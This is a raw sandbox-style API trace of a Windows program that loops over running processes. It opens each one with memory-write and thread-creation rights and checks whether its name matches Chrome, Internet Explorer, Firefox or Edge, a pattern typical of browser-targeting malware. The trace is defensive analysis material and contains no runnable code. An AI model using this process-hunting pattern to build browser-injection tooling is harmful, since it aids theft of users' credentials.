	[0248.226] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.227] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9b28
	[0248.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.227] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.227] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.228] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.229] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.230] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.230] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9b2c
	[0248.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.231] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.231] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.231] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.232] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.232] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9b30
	[0248.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.233] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.233] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.233] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.234] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.234] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0248.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x9b34
	[0248.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.235] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0248.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.235] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.236] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0248.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.236] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.236] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0248.237] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9b38
	[0248.237] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.237] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.238] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.238] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.238] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.239] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0248.239] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9b3c
	[0248.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.240] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0248.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.240] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.240] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0248.240] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.240] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.240] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.241] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9b40
	[0248.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.241] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.242] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.242] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.243] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.243] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0248.245] CloseHandle (hObject=0x4fd0) returned 1
	[0248.245] Sleep (dwMilliseconds=0x64) 
	[0248.355] GetCurrentProcessId () returned 0x110
	[0248.355] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0248.361] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0248.363] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0248.365] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0248.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x9b44
	[0248.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.366] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.366] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.367] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.367] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.367] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.368] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9b48
	[0248.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.369] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.369] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.369] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.370] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.370] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0248.371] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9b4c
	[0248.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.371] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0248.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.371] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.372] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0248.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.372] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.372] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0248.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x9b50
	[0248.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.373] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0248.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.373] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.374] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0248.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.374] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.374] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0248.375] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x9b54
	[0248.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.375] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0248.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.375] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.376] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0248.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.376] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.376] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0248.377] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x9b58
	[0248.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.377] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0248.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.378] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.378] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0248.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.379] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.379] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0248.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x9b5c
	[0248.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.380] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0248.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.380] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.380] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0248.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.380] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.381] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0248.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x9b60
	[0248.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.382] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.382] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.382] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.382] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.383] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x9b64
	[0248.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.383] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.384] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.385] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.385] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x9b68
	[0248.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.386] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.386] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.387] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.387] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.387] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x9b6c
	[0248.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.388] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.389] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.389] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.389] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x9b70
	[0248.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.390] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.391] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.391] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.391] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x9b74
	[0248.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.392] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.393] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.393] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.393] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.393] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9b78
	[0248.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.394] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.395] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.395] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.395] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.396] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9b7c
	[0248.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.396] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.397] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.397] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.397] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.398] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0248.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9b80
	[0248.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.399] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0248.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.399] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.401] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0248.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.401] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.402] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.402] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9b84
	[0248.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.403] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.403] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.403] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
